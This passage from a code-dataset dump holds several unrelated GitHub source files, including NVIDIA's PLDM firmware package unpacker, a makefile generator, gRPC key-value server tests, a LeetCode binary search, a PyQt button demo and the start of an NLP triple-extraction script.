parsing and unpacking was successful\n \"\"\"\n if package_name == \"\" or package_name is None:\n log_msg = \"ERROR: Firmware package file is mandatory.\"\n Util.cli_log(log_msg, False)\n return False\n if os.path.exists(package_name) is False:\n log_msg = print(\"ERROR: File does not exist at path \",\n package_name)\n Util.cli_log(log_msg, False)\n return False\n self.package = package_name\n try:\n with open(self.package, \"rb\") as self.fwpkg_fd:\n parsing_valid = self.parse_header()\n if parsing_valid:\n parsing_valid = self.parse_device_id_records()\n if parsing_valid:\n parsing_valid = self.parse_component_img_info()\n self.get_pldm_header_checksum()\n if parsing_valid and self.unpack:\n if output_dir == \"\" or output_dir is None:\n # If outdir was not given in command\n # assume current directory\n output_dir = \".\"\n output_dir = os.path.abspath(output_dir) + \"/\"\n # If dir doesn't exist, create it\n if os.path.isdir(output_dir) is False:\n os.makedirs(output_dir)\n parsing_valid = self.create_unpacked_files(output_dir)\n if self.verbose:\n log_message = f\"PLDM Output directory: {output_dir}, \\\n Package name: {package_name}\"\n\n Util.cli_log(log_message, True)\n if parsing_valid is False:\n log_message = \"Package Header Contents:\\\n \" + str(self.header_map)\n Util.cli_log(log_message, True)\n log_message = \"FirmwareDeviceIDRecords Contents:\\\n \" + str(self.fd_id_record_list)\n Util.cli_log(log_message, True)\n log_message = \"ComponentImageInformation Contents:\\\n \" + str(self.component_img_info_list)\n Util.cli_log(log_message, True)\n return parsing_valid\n except IOError as e_io_error:\n log_message = f\"Couldn't open or read given FW package ({e_io_error})\"\n Util.cli_log(log_message, False)\n return False\n\n def get_applicable_component_index(self, applicable_component):\n \"\"\"\n Return list of indices of applicable component images from\n applicable_component index bitmap.\n \"\"\"\n # 
number of images in the image section\n max_bits = len(self.component_img_info_list)\n indices = []\n for shift in range(max_bits):\n # for each index check if the bit at that position is set in applicable_component\n mask = 1 << shift\n result = applicable_component & mask\n if result == mask:\n indices.append(shift)\n return indices\n\n def get_signature_type(self, fw_image, component_identifier):\n \"\"\" Method to tell if unpacked bin is prod signed or debug signed \"\"\"\n return 'N/A'\n \n @staticmethod\n def is_glacier_device(record, device_name):\n \"\"\"\n Is this device a glacer device\n \"\"\"\n if device_name.startswith(\"ERoT\"):\n return True\n if record[\"DescriptorCount\"] == 0:\n return False\n record_desc = record[\"RecordDescriptors\"]\n for desc in record_desc:\n descriptor_type = desc.get(\"AdditionalDescriptorType\", \"\")\n if descriptor_type == 65535:\n title = desc.get(\"VendorDefinedDescriptorTitleString\", \"\")\n if title == \"GLACIERDSD\":\n return True\n return False\n\n def get_applicable_components_names(self, record):\n # pylint: disable=too-many-branches\n \"\"\"\n Method to create list of applicable component images and their metadata like\n ComponentIdentifier and Version. FWImage is included if unpacking was done.\n Also prepares ComponentImageSetVersionString in name:model:vendor,... format if\n it is not already so.\n \"\"\"\n index = self.get_applicable_component_index(\n record[\"ApplicableComponents\"])\n components = []\n device_name = record[\"ComponentImageSetVersionString\"]\n for i in index:\n component = {}\n img = self.component_img_info_list[i]\n if self.unpack is True:\n component = {\n \"ComponentIdentifier\": \"\",\n \"ComponentVersionString\": \"\",\n \"FWImage\": \"\"\n }\n component[\"FWImage\"] = img[\"FWImageName\"]\n component[\n \"FWImageSHA256\"] = Util.get_checksum_for_component_image(\n component[\"FWImage\"])\n # For ERoT associated devices get signature type\n if self.is_glacier_device(\n record, component[\"FWImage\"].rsplit('/', 1)[-1]):\n signature_type = self.get_signature_type(\n component[\"FWImage\"], img[\"ComponentIdentifier\"])\n if signature_type:\n component[\"SignatureType\"] = signature_type\n else:\n component[\"SignatureType\"] = \"N/A\"\n component[\"FWImageSize\"] = img[\"ComponentSize\"]\n else:\n component = {\n \"ComponentIdentifier\": \"\",\n \"ComponentVersionString\": \"\"\n }\n component[\"ComponentIdentifier\"] = img[\"ComponentIdentifier\"]\n component[\"ComponentVersionString\"] = img[\"ComponentVersionString\"]\n components.append(component)\n if not self.unpack:\n ap_sku, ec_sku = 'N/A', 'N/A'\n records = record[\"RecordDescriptors\"]\n for i in range(1, len(records)):\n if records[i][\"AdditionalDescriptorType\"] == 65535:\n if records[i][\n \"VendorDefinedDescriptorTitleString\"] == \"APSKU\":\n ap_sku = \"0x\" + records[i][\n \"VendorDefinedDescriptorData\"]\n elif records[i][\n \"VendorDefinedDescriptorTitleString\"] == \"ECSKU\":\n ec_sku = \"0x\" + records[i][\n \"VendorDefinedDescriptorData\"]\n\n for component in components:\n if component.get(\"ComponentIdentifier\") == \"0xff00\":\n component[\"ECSKUID\"] = ec_sku\n else:\n component[\"APSKUID\"] = ap_sku\n return components, device_name\n\n def decode_descriptor_data(self, desc_type_name, desc_data):\n \"\"\" Formatting for descriptor data based on endianess\"\"\"\n desc_val = \"\"\n if desc_type_name in self.little_endian_list:\n desc_val = Util.get_padded_hex(desc_data)\n else:\n desc_val = \"0x\" + desc_data.hex()\n return 
desc_val\n\n def get_formatted_descriptors(self, record_desc, components):\n \"\"\"\n Method to prepare stripped and formatted descriptor section for json output.\n \"\"\"\n records = record_desc[\"RecordDescriptors\"]\n descriptors = []\n desc = {}\n if len(records) == 0:\n return descriptors\n desc[\"InitialDescriptorType\"] = Util.get_descriptor_type_name(\n records[0][\"InitialDescriptorType\"])\n desc[\"InitialDescriptorData\"] = self.decode_descriptor_data(\n desc[\"InitialDescriptorType\"], records[0][\"InitialDescriptorData\"])\n descriptors.append(desc)\n for i in range(1, len(records)):\n desc = {}\n desc[\"AdditionalDescriptorType\"] = Util.get_descriptor_type_name(\n records[i][\"AdditionalDescriptorType\"])\n if records[i][\"AdditionalDescriptorType\"] == 65535:\n desc[\"VendorDefinedDescriptorTitleString\"] = records[i][\n \"VendorDefinedDescriptorTitleString\"]\n desc_data = records[i][\"VendorDefinedDescriptorData\"]\n desc[\"VendorDefinedDescriptorData\"] = '0x' + str(desc_data)\n if desc[\"VendorDefinedDescriptorTitleString\"] == \"APSKU\":\n # AP SKU on Retimer is just vendor id, not a real AP SKU ID. So skip\n if \"FWImage\" in components[-1] and \\\n not \"PCIeRetimer\" in components[-1][\"FWImage\"]:\n bin_ary = bytearray.fromhex(\n desc_data[:-2]) # First byte is strap id\n bin_ary.reverse()\n ap_sku_id = ''.join(format(x, '02x') for x in bin_ary)\n components[-1][\"AP_SKU_ID\"] = \"0x\" + ap_sku_id\n desc[\"VendorDefinedDescriptorData\"] = components[-1][\n \"AP_SKU_ID\"]\n else:\n desc[\"AdditionalDescriptorData\"] = self.decode_descriptor_data(\n desc[\"AdditionalDescriptorType\"],\n records[i][\"AdditionalDescriptorIdentifierData\"])\n descriptors.append(desc)\n return descriptors\n\n def get_full_metadata_json(self):\n \"\"\" Decode byte value descriptors for full package metadata command \"\"\"\n for device_records in self.full_header[\n 'FirmwareDeviceIdentificationArea']['FirmwareDeviceIDRecords']:\n device_records[\n 'ApplicableComponents'] = self.get_applicable_component_index(\n device_records['ApplicableComponents'])\n records = device_records[\"RecordDescriptors\"]\n descriptors = []\n if len(records) == 0:\n continue\n desc = records[0]\n desc[\"InitialDescriptorType\"] = Util.get_descriptor_type_name(\n records[0][\"InitialDescriptorType\"])\n desc[\"InitialDescriptorData\"] = self.decode_descriptor_data(\n desc[\"InitialDescriptorType\"], desc[\"InitialDescriptorData\"])\n descriptors.append(desc)\n for i in range(1, len(records)):\n desc = records[i]\n desc[\n \"AdditionalDescriptorType\"] = Util.get_descriptor_type_name(\n records[i][\"AdditionalDescriptorType\"])\n if desc[\"AdditionalDescriptorType\"] == 'Vendor Defined':\n desc[\"VendorDefinedDescriptorTitleString\"] = records[i][\n \"VendorDefinedDescriptorTitleString\"]\n desc_data = records[i][\"VendorDefinedDescriptorData\"]\n desc[\"VendorDefinedDescriptorData\"] = '0x' + str(desc_data)\n else:\n desc[\n \"AdditionalDescriptorIdentifierData\"] = self.decode_descriptor_data(\n desc[\"AdditionalDescriptorType\"],\n desc[\"AdditionalDescriptorIdentifierData\"])\n descriptors.append(desc)\n device_records[\"RecordDescriptors\"] = descriptors\n\n def prepare_records_json(self):\n # pylint: disable=line-too-long\n \"\"\"\n Prepares the JSON output for the tool.\n \"\"\"\n package_json = {\n \"PackageHeaderInformation\": {},\n \"FirmwareDeviceRecords\": []\n }\n package_json[\"PackageHeaderInformation\"][\"PackageHeaderIdentifier\"] = (\n self.header_map[\"PackageHeaderIdentifier\"])\n 
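# Only header format revision \"1\" (a PLDM firmware update v1.0 package, matching\n        # the UUID check in parse_header) is supported; other revisions are rejected below.\n        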
package_json[\"PackageHeaderInformation\"][\n \"PackageHeaderFormatRevision\"] = (\n self.header_map[\"PackageHeaderFormatRevision\"])\n if package_json[\"PackageHeaderInformation\"][\n \"PackageHeaderFormatRevision\"] != \"1\":\n return False, \"The input firmware package version does not conform \\\n to the format created by NVIDIA packaging tool.\"\n\n package_json[\"PackageHeaderInformation\"][\"PackageReleaseDateTime\"] = (\n self.header_map[\"PackageReleaseDateTime\"])\n package_json[\"PackageHeaderInformation\"][\"PackageVersionString\"] = (\n self.header_map[\"PackageVersionString\"])\n package_json['PackageHeaderInformation'][\"PackageSHA256\"] = (\n Util.get_checksum_for_component_image(self.package))\n recordlist = []\n for record in self.fd_id_record_list:\n rec = {\n \"ComponentImageSetVersionString\": \"\",\n \"DeviceDescriptors\": [],\n \"Components\": []\n }\n components, name = self.get_applicable_components_names(record)\n if not components or not name:\n return False, \"The input firmware package does not conform to \\\n the format created by NVIDIA packaging tool.\"\n\n rec[\"DeviceDescriptors\"] = self.get_formatted_descriptors(\n record, components)\n rec[\"Components\"] = components\n rec[\"ComponentImageSetVersionString\"] = name\n recordlist.append(rec)\n package_json[\"FirmwareDeviceRecords\"] = recordlist\n json_string = json.dumps(package_json, indent=4)\n return True, json_string\n\n\ndef main():\n \"\"\"\n Call upack parser and prepare output json\n \"\"\"\n arg_parser = argparse.ArgumentParser(prog='fwpkg-unpack',\n description=\"\\\n NVIDIA fwpkg-unpack v{UNPACK_TOOL_VERSION} The firmware package unpack tool performs parsing of\\\n the firmware package and unpacking. The unpacker will extract all firmware\\\n images from the package and create bin files for each.\",\n allow_abbrev=False)\n arg_parser.add_argument(\n \"file\", help=\"Provide firmware package filename to unpack.\", nargs='?')\n arg_group = arg_parser.add_mutually_exclusive_group(required=True)\n arg_group.add_argument(\n \"--unpack\",\n action='store_true',\n help=\"Unpack the firmware package and extract all component images.\")\n arg_group.add_argument(\n \"--show_pkg_content\",\n action='store_true',\n help=\n \"Provide package content description without extracting firmware images.\"\n )\n arg_group.add_argument(\n \"--show_all_metadata\",\n action='store_true',\n help=\n \"Provide all PLDM metadata in package without extracting firmware images.\"\n )\n arg_parser.add_argument(\n \"--outdir\",\n help=\n \"Provide path to the directory where unpacked FW files will be stored. \\\n This option is used along with --unpack. \\\n If this option not specified with --unpack, current directory is assumed as outdir. \\\n Creates the directory at a given path if it does not exist.\")\n arg_group.add_argument(\"--version\",\n action='store_true',\n help=\"Show tool version.\")\n arg_parser.add_argument(\n \"--verbose\",\n action='store_true',\n help=\n \"Verbose Mode, This option is used along with --unpack or --show_pkg_content. 
\\\n By using this command, debug prints from the code will be copied in a debug \\\n logfile created in the same directory with name fwpkg_unpack_log.txt from\\\n unpack tool.\")\n tool_args = arg_parser.parse_args()\n\n pldm_parser = PLDMUnpack()\n pldm_parser.unpack = tool_args.unpack\n\n if tool_args.show_pkg_content is True:\n pldm_parser.unpack = False\n\n if tool_args.version is True:\n print(f\"NVIDIA fwpkg-unpack - version {UNPACK_TOOL_VERSION}\")\n sys.exit(0)\n else:\n parser_status = pldm_parser.unpack_pldm_package(\n tool_args.file, tool_args.outdir)\n if parser_status is True:\n json_output = {}\n if tool_args.show_all_metadata is False:\n parser_status, json_output = pldm_parser.prepare_records_json()\n if not parser_status:\n print(\"Status : Failed to prepare JSON records\")\n print(\"Path for LogFile \", Util.LOGFILE_PATH)\n else:\n pldm_parser.get_full_metadata_json()\n json_output = json.dumps(pldm_parser.full_header,\n sort_keys=False,\n indent=4)\n print(json_output)\n sys.exit(0)\n else:\n print(\"Status : Failed\")\n print(\"Path for LogFile \", Util.LOGFILE_PATH)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA/PLDM-unpack","sub_path":"fwpkg_unpack.py","file_name":"fwpkg_unpack.py","file_ext":"py","file_size_in_byte":38661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26174591710","text":"#!/usr/bin/env python3\n\n# this script analyzes all the source files and extracts any header dependencies it uses.\n# it then constructs a makefile for automated building with partial compilation.\n# the output makefile is additionally optimized for parallel compilation.\n\nimport os, shutil, re\n\n# --------------------------------------\n\n# name of the output makefile\nout_name = \"makefile\"\n\n# name of the exe file to produce (as a result of running the generated makefile)\nexe_name = \"csx.exe\"\n\n# the list of source directories - their contents are searched for .cpp files\nsource_dirs = [ \"./\", \"src/\" ]\n\n# the directory to place object files in\nobjdir = \"obj/\"\n\nbuild_info = [\n type(\"obj\", (object,), x) for x in [\n { \"name\" : \"release\", \"compile\" : \"g++ -O4 -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -c {}\", \"link\" : \"g++ {} -lstdc++fs\" },\n { \"name\" : \"debug\", \"compile\" : \"g++ -Og -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -c {} -Wno-maybe-uninitialized\", \"link\" : \"g++ {} -lstdc++fs\" },\n { \"name\" : \"release-san\", \"compile\" : \"clang++ -O3 -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -fsanitize=undefined -fsanitize=address -c {}\", \"link\" : \"clang++ -fsanitize=undefined -fsanitize=address {} -lstdc++fs\" },\n { \"name\" : \"debug-san\", \"compile\" : \"clang++ -Og -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -fsanitize=undefined -fsanitize=address -c {}\", \"link\" : \"clang++ -fsanitize=undefined -fsanitize=address {} -lstdc++fs\" },\n ]\n]\n\n# --------------------------------------\n\nsource = []\nfor dir in source_dirs:\n for name in os.listdir(dir):\n if name.endswith(\".cpp\"):\n dep = []\n with open(dir + name, \"r\") as file:\n for line in file:\n match = re.fullmatch(\"\\\\s*#include \\\"(.*)\\\"\\\\s*\", line)\n if match: dep.append(match.groups()[0])\n source.append(type(\"obj\", (object,), { \"name\" : name, \"dir\" : dir, \"dep\" : dep, \"size\" : os.path.getsize(dir + name) }))\n\nsource.sort(key=lambda s: s.size, reverse=True)\n\nprint(\"Parsed Dependencies:\\n\")\nfor s in source:\n print(f\"{s.dir + s.name} 
({s.size}):\")\n    for d in s.dep: print(f\"\\t{s.dir + d}\")\n    print()\n\n# --------------------------------------\n\nif os.path.exists(objdir): shutil.rmtree(objdir)\n\nwith open(out_name, \"w\") as out:\n    objsets = []\n\n    for build in build_info:\n        os.makedirs(objdir + build.name)\n\n        objs = \"\"\n        for s in source: objs += f\" {objdir + build.name}/{s.name[:-4]}.o\"\n        objsets.append(objs)\n\n        out.write(f\"{build.name}:{objs}\\n\\t{build.link.format(objs)} -o {exe_name}\\n\\n\")\n\n        for s in source:\n            dep = \"\"\n            for d in s.dep: dep += \" {}\".format(s.dir + d)\n            obj_path = f\"{objdir + build.name}/{s.name[:-4]}.o\"\n            out.write(f\"{obj_path}:{dep}\\n\\t{build.compile.format(s.dir + s.name)} -o {obj_path}\\n\\n\")\n    \n    clean_cmd = f\"clean:\\n\\trm -f {exe_name}\"\n    for set in objsets: clean_cmd += f\"\\n\\trm -f {set}\"\n    out.write(clean_cmd + \"\\n\\n\")\n","repo_name":"dragazo/CSX64-cpp","sub_path":"makemake.py","file_name":"makemake.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3832767075","text":"import json\nimport os\n\nimport yaml\nimport argparse\n\ndef load_datacollection_config(path):\n    datacollection_config_path = path\n    with open(datacollection_config_path) as f:\n        contents = f.read()\n    config = yaml.safe_load(contents)\n\n    return config\n\ndef get_args():\n    parser = argparse.ArgumentParser(description='Read data collection policy config to do tests')\n    parser.add_argument('path', type=str)\n    return vars(parser.parse_args())\n\ndef main():\n    args = get_args()\n    config = load_datacollection_config(args['path'])\n    pick_models = list(config['models']['pick_models'].keys())\n    print(pick_models)\n\n    calibration = config['cached_calibrations']\n    print(type(calibration))\n\n    print(config[\"tooltips\"][\"end_effectors\"])\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"geleazar1000111/ryu","sub_path":"Tests/Config_Read/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898550227","text":"# https://leetcode.com/problems/search-in-rotated-sorted-array/\n\n\n# Binary search, TC:O(logN), SC:O(1)\ndef search(nums, target):\n    L, H = 0, len(nums)\n    while L < H:\n        M = (L+H) // 2\n        if target < nums[0] < nums[M]: # -inf\n            ## to the right\n            L = M+1\n        elif target >= nums[0] > nums[M]: # +inf\n            ## to the left\n            H = M\n        elif nums[M] < target:\n            ## to the right\n            L = M+1\n        elif nums[M] > target:\n            ## to the left\n            H = M\n        else:\n            return M\n    return -1\n\n# Binary search, TC:O(logN), SC:O(1)\ndef search2(nums, target):\n    \"\"\"\n    :type nums: List[int]\n    :type target: int\n    :rtype: int\n    \"\"\"\n    left, right = 0, len(nums) - 1\n    while left <= right:\n        mid = (left + right) // 2\n        # if found target value, return the index\n        if nums[mid] == target:\n            return mid\n\n        # determine whether it's left rotated or right rotated\n        \"\"\"\n        Not rotated:\n        1 2 3 4 5 6 7\n              mid\n\n        left rotated: pivot at the left side of the original sorted array, A[mid] >= A[left]\n        3 4 5 6 7 1 2\n              mid\n        search in A[left] ~ A[mid] if A[left] <= target < A[mid] else, search right side\n\n        right rotated: pivot at the right side of the original sorted array, A[mid] < A[left]\n        6 7 1 2 3 4 5\n              mid    \n        search in A[mid] ~ A[right] if A[mid] < target <= A[right] else, search left side\n        \"\"\"\n        if nums[mid] >= nums[left]: # left rotated\n            # in ascending order side\n            if nums[left] <= target <= 
nums[mid]:\n                # if nums[L] == target, go left until L = R = 0\n                right = mid - 1\n            else:\n                left = mid + 1\n        else: # right rotated\n            # in ascending order side\n            if nums[mid] <= target <= nums[right]:\n                # if nums[R]==target, go right until L = R = len(nums)-1\n                left = mid + 1\n            else:\n                right = mid - 1\n    # cannot find the target value\n    return -1","repo_name":"ychanc2104/LeetCode","sub_path":"Search In Rotated Sorted Array.py","file_name":"Search In Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12653559572","text":"\"\"\"Implementation of a function that verifies the\ninserted tags and validates them against the standard in a certain way.\"\"\"\nfrom . import ok, nok\n\n\ndef __boolToString(b):\n    \"\"\"Converts a boolean to a standard string\"\"\"\n    return str(b).lower()\n\n\nBOOLEAN_STANDARD = [\"true\", \"false\"]\n\n\ndef checkTagsAndCompleteInfo(usecase, repoName, roleHttp, roleWS, internalAPIGW, customerAPIGW,\n                             customerAPIGWWS, externalResourcesAPIGW, stage, config, *nextArgs):\n    \"\"\"Verify and complete the remaining tag information in the use case.\"\"\"\n    tags = usecase[\"tags\"]\n    for wayOfInvoke in [\"http\", \"ws\", \"queue\"]:\n        tags[wayOfInvoke] = tags.get(wayOfInvoke, \"false\")\n        assert tags[wayOfInvoke] in BOOLEAN_STANDARD, \\\n            f\"{nok}{wayOfInvoke} is not among the standard values allowed for boolean values\"\n    assert (int(tags[\"http\"] == \"true\") +\n            int(tags[\"ws\"] == \"true\") + int(tags[\"queue\"] == \"true\") < 2), \\\n        f\"{nok}More than one of the properties http, ws or queue are true\"\n    assert (int(tags[\"http\"] == \"true\") +\n            int(tags[\"ws\"] == \"true\") + int(tags[\"queue\"] == \"true\") > 0), \\\n        f\"{nok}Of the http, queue or ws properties there must be one with true\"\n\n    usecase[\"role\"] = roleHttp # <- default role\n    apigw = tags[\"apigw\"]\n\n    if tags[\"http\"] == \"true\":\n        usecase[\"method\"] = usecase[\"method\"].upper()\n        assert usecase[\"method\"] in [\"GET\", \"DELETE\", \"UPDATE\", \"POST\"]\n        assert \"route\" in usecase\n        usecase[\"role\"] = roleHttp\n        # Map it if needed\n        if usecase[\"method\"] == \"UPDATE\":\n            usecase[\"method\"] = \"PUT\"\n\n        if apigw == \"internal\":\n            usecase[\"apigateway\"] = internalAPIGW\n        elif apigw == \"customer\":\n            usecase[\"apigateway\"] = customerAPIGW\n        elif apigw == \"receptor\":\n            usecase[\"apigateway\"] = externalResourcesAPIGW\n        elif apigw == \"none\":\n            usecase[\"apigateway\"] = \"none\"\n        else:\n            raise AssertionError(f\"\\n{nok}There is no compatible api gateway\")\n\n    elif tags[\"ws\"] == \"true\":\n        usecase[\"role\"] = roleWS\n        if apigw == \"customer\":\n            usecase[\"apigateway\"] = customerAPIGWWS\n        else:\n            raise AssertionError(f\"\\n{nok}There is no compatible api gateway\")\n    elif tags[\"queue\"] == \"true\":\n        usecase[\"role\"] = roleWS\n        usecase[\"apigateway\"] = 'none'\n    else:\n        usecase[\"apigateway\"] = 'none'\n\n    # Microservice\n    tags[\"ms\"] = repoName.split('.')[0]\n\n    # Stage\n    usecase[\"stage\"] = stage\n\n    # AWS Layers\n    usecase[\"layers\"] = \" \".join(nextArgs)\n\n    # Cacheable: if the operation does not change over time, many caches are allowed;\n    # it means the operation returns the same result when the same parameters are received.\n    usecase[\"cacheable\"] = usecase.get(\"cacheable\", False)\n    tags[\"cacheable\"] = __boolToString(usecase[\"cacheable\"])\n\n    # Need authentication\n    usecase[\"needAuthentication\"] = usecase.get(\"needAuthentication\", False)\n    
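# Mirror the flag into tags as a lowercase string so it is included in tagstring below.\n    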
tags[\"needAuthentication\"] = __boolToString(usecase[\"needAuthentication\"])\n\n usecase[\"envs\"] = \"\".join(f\",{k}='{v}'\" for k, v in\n {**usecase.get(\"envs\", {}), **config.get(\"envs\", {})}.items())\n usecase[\"tagstring\"] = \",\".join(f\"{k}='{v}'\" for k, v in tags.items())\n return usecase\n","repo_name":"datikz/build-payload-and-metadata.datikzpipelinescript","sub_path":"buildPayload/utils/checkTagsAndCompleteInfo.py","file_name":"checkTagsAndCompleteInfo.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71228215527","text":"import concurrent.futures\nimport contextlib\nimport unittest\nimport threading\nimport queue\n\nimport grpc_kv_server\n\nimport grpc\nimport key_value_pb2\nimport key_value_pb2_grpc\n\n_TEST_VALUES = (\"air-bud\", \"doug-the-dog\", \"the-one-from-full-house\")\n\n\n@contextlib.contextmanager\ndef _test_server():\n server, port = grpc_kv_server._run_server_non_blocking('localhost', 0)\n try:\n yield server, port\n finally:\n server.stop(0)\n\n\nclass TestGrpcKvServer(unittest.TestCase):\n def test_without_grpc(self):\n kv_store = grpc_kv_server.KeyValueStore()\n kv_store.store(\"golden-retriever\", \"pancakes\")\n self.assertEqual(\"pancakes\", kv_store.get(\"golden-retriever\"))\n\n def test_watch_without_grpc(self):\n kv_store = grpc_kv_server.KeyValueStore()\n kv_store.store(\"golden-retriever\", \"pancakes\")\n start_event = threading.Event()\n stop_event = threading.Event()\n\n def _gather_responses():\n start_event.set()\n return list(kv_store.watch(\"golden-retriever\", stop_event))\n\n thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)\n responses_future = thread_pool.submit(_gather_responses)\n start_event.wait()\n for value in _TEST_VALUES:\n kv_store.store(\"golden-retriever\", value)\n stop_event.set()\n responses = responses_future.result()\n self.assertSequenceEqual(_TEST_VALUES, responses)\n\n def test_with_grpc_in_a_single_process(self):\n with _test_server() as (server, port):\n with grpc.insecure_channel('localhost:{}'.format(port)) as channel:\n stub = key_value_pb2_grpc.KeyValueStoreStub(channel)\n create_request = key_value_pb2.CreateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\",\n value=\"pancakes\",\n ))\n create_response = stub.CreateRecord(\n create_request, wait_for_ready=True)\n self.assertEqual(create_request.record, create_response)\n\n get_request = key_value_pb2.GetRecordRequest(\n name=\"golden-retriever\")\n get_response = stub.GetRecord(get_request)\n self.assertEqual(get_response, create_request.record)\n\n def test_server_watch(self):\n with _test_server() as (server, port):\n with grpc.insecure_channel('localhost:{}'.format(port)) as channel:\n stub = key_value_pb2_grpc.KeyValueStoreStub(channel)\n create_request = key_value_pb2.CreateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\",\n value=\"pancakes\",\n ))\n stub.CreateRecord(create_request, wait_for_ready=True)\n watch_request = key_value_pb2.WatchRecordRequest(\n name=\"golden-retriever\")\n\n responses = queue.Queue()\n\n def _gather_responses(stub, request):\n response_iterator = stub.WatchRecord(request)\n for response in response_iterator:\n responses.put(response.value)\n if response.value == _TEST_VALUES[-1]:\n break\n response_iterator.cancel()\n\n thread_pool = concurrent.futures.ThreadPoolExecutor(\n max_workers=1)\n gather_future = thread_pool.submit(_gather_responses, stub,\n 
watch_request)\n                _SENTINEL = \"sentinel\"\n                # Add meaningless values until the Watch connection has been confirmed\n                # to be established.\n                while responses.empty():\n                    stub.UpdateRecord(\n                        key_value_pb2.UpdateRecordRequest(\n                            record=key_value_pb2.Record(\n                                name=\"golden-retriever\", value=_SENTINEL)))\n                # Append test values.\n                for value in _TEST_VALUES:\n                    stub.UpdateRecord(\n                        key_value_pb2.UpdateRecordRequest(\n                            record=key_value_pb2.Record(\n                                name=\"golden-retriever\", value=value)))\n                # Ensure the queue has been filled with the collected values.\n                gather_future.result()\n                filtered_responses = [\n                    response for response in responses.queue\n                    if response != _SENTINEL\n                ]\n                self.assertSequenceEqual(_TEST_VALUES, filtered_responses)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"gnossen/grpc-example","sub_path":"grpc_kv_server/src/test/kv_server_test.py","file_name":"kv_server_test.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39826072669","text":"from rest_utils import json_response, json_error, catch_exception\nfrom img_borders import laplace, prewitt, roberts, sobel\nfrom img_utils import base64_to_bw_img, img_to_base64\n\nBorderMethods = dict(\n    prewitt=prewitt,\n    laplace=laplace,\n    roberts=roberts,\n    sobel=sobel,\n)\n\n\ndef process_image(blob_img, method):\n    img = base64_to_bw_img(blob_img)\n    return BorderMethods[method](img)\n\n\n@catch_exception\ndef image_borders(request):\n    if request.headers.get('content-type') != 'application/json':\n        return json_error(\"Use application/json\")\n\n    request_json = request.get_json(silent=True)\n    if not request_json:\n        return json_error(\"JSON is invalid\")\n\n    image = request_json['image']\n    method = request_json['method']\n\n    processed_img = process_image(image, method)\n    return json_response(dict(\n        image=img_to_base64(processed_img).decode('utf-8')\n    ))\n","repo_name":"Fredy/GCP_Things","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41858677126","text":"# [String] Basic string handling - Programmers Level 1\nstr = 'a234'\n\ndef solution(s):\n    answer = True\n\n    if(len(s) != 4 and len(s) != 6):\n        return False\n    for i in s:\n        if i.isdigit() == False:\n            answer = False\n            break\n\n    return answer\n\n\nsolution(str)\n","repo_name":"908jyw/pythonAlgorithm","sub_path":"string/basicOfString.py","file_name":"basicOfString.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36945287218","text":"from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel\r\nfrom PyQt5.QtGui import QPainter, QColor, QFont\r\nfrom PyQt5.QtCore import Qt\r\n\r\n\r\nclass Button(QPushButton):\r\n    def __init__(self, parent=None, msg='', left=0, top=0):\r\n        super().__init__(parent)\r\n        self.setGeometry(left, top, 150, 50)\r\n        self.setStyleSheet(\"background-color: rgb(72, 61, 139); color: rgb(255, 255, 255);\")\r\n        self.setText(msg)\r\n        self.setFont(QFont('kaiti', 20))\r\n\r\n    def paintEvent(self, event):\r\n        super().paintEvent(event)\r\n        painter = QPainter(self)\r\n        painter.setRenderHint(QPainter.Antialiasing)\r\n        painter.drawText(self.rect(), Qt.AlignCenter, self.text())\r\n\r\n\r\nclass MyWidget(QWidget):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.initUI()\r\n\r\n    def initUI(self):\r\n        
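# Set up a fixed 400x300 window and connect the custom Button's clicked signal.\r\n        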
self.setGeometry(100, 100, 400, 300)\r\n        self.setWindowTitle('PyQt Button Example')\r\n\r\n        self.button = Button(self, 'Click me', 125, 125)\r\n        self.button.clicked.connect(self.onButtonClick)\r\n\r\n    def onButtonClick(self):\r\n        print('Button clicked')\r\n\r\n\r\nif __name__ == '__main__':\r\n    import sys\r\n\r\n    app = QApplication(sys.argv)\r\n    widget = MyWidget()\r\n    widget.show()\r\n    sys.exit(app.exec_())\r\n","repo_name":"milab-neuq/chess_gui","sub_path":"chineseChess_gui/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71361636327","text":"import os\nimport re\n\nimport sys\nsys.path.append(\"..\")\nfrom core.nlp import NLP\nfrom core.extractor import Extractor\n\nif __name__ == '__main__':\n    input_path = '../../data/dev.txt' # input path\n    output_path = '../../data/knowledge_triple.json' # output path of json file \n    output_path2 = '../../data/triple_result.txt' # output path of triple txt file \n    if os.path.isfile(output_path):\n        os.remove(output_path)\n        # os.mkdir(output_path)\n\n    print('Start extracting...')\n\n    nlp = 